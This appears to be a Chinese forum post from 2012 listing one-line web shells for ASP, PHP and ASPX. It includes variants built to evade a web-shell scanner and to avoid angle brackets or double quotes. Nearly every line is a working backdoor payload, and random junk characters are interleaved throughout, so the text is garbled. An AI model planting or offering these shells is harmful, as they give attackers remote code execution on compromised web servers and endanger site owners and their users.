asp一句话 <%execute(request("1"))%>
4 |5 ^9 a! i9 _% S# E8 N) M8 m
$ T( a z8 Q+ l- d% {8 q# p! Aphp一句话 <?php eval($_POST[1]);?> , G7 s2 u' V4 J) R
! l z$ ` B; l$ n4 @0 R! A
aspx一句话 x, @- \% k' i1 i \
. `1 v3 t6 v, N: l2 a+ M& j* Y
<script language="C#" runat="server">/ C3 m7 P# @: \3 M
3 c7 k; D$ d$ ?0 `. H2 G
WebAdmin2Y.x.y aaaaa = new WebAdmin2Y.x.y ("add6bb58e139be10");
' b- E& B6 c7 ?$ C2 |
+ f- B7 r: E/ [% I/ B1 s</script>
) ?' Q7 `/ x. D% F$ f# |( `3 {) C# Y# K( ?1 V2 z
可以躲过雷客图的一句话。
0 l. R4 ^" N* W+ U) f: R* _ Z) h0 j/ h* W2 |+ R9 `# J7 m# u5 {' |
<%
) @% v7 u6 @! y, O; v4 F$ [! S0 R5 V+ R" }
set ms = server.CreateObject("MSScriptControl.ScriptControl.1")8 g) L( D# f9 M" G
6 ^, P2 e' v7 I: M- C: p ms.Language="VBScript"
2 j" }' f. m% Y. Y
2 ~; r3 l5 R4 Y- W ms.AddObject "Response", Response
+ [0 E2 U% Q8 P7 h7 ~
, [ x* C5 D7 Y1 L ms.AddObject "request", request
% A0 m# `1 e' Y2 X3 W, L# J% B9 c0 X) c' }, H
ms.ExecuteStatement("ev"&"al(request(""1""))") I0 ?/ g1 r0 B; L8 l6 q( h! _
7 @. S% f; A% E! i$ g, F' R* z
%>( S$ N5 R% r# r9 u' G
+ }0 k# v6 B( z, K
不用'<,>'的asp一句话$ ~ r1 G# y2 X% s% @; C
7 R6 G, m0 Z- M <script language=VBScript runat=server>execute request("1")</script> ~: G/ Y/ r1 K( h( U$ t1 f: y
+ f7 d2 v: K. l& W 不用双引号的一句话。
9 d# B' `. V. m$ d- i7 i4 P7 f; G( q. D3 b& V7 u
<%eval request(chr(35))%>
: S3 Z5 K' |- G$ V$ B# D5 i |
发表于 2012-9-23 14:36:09
收藏
支持
反对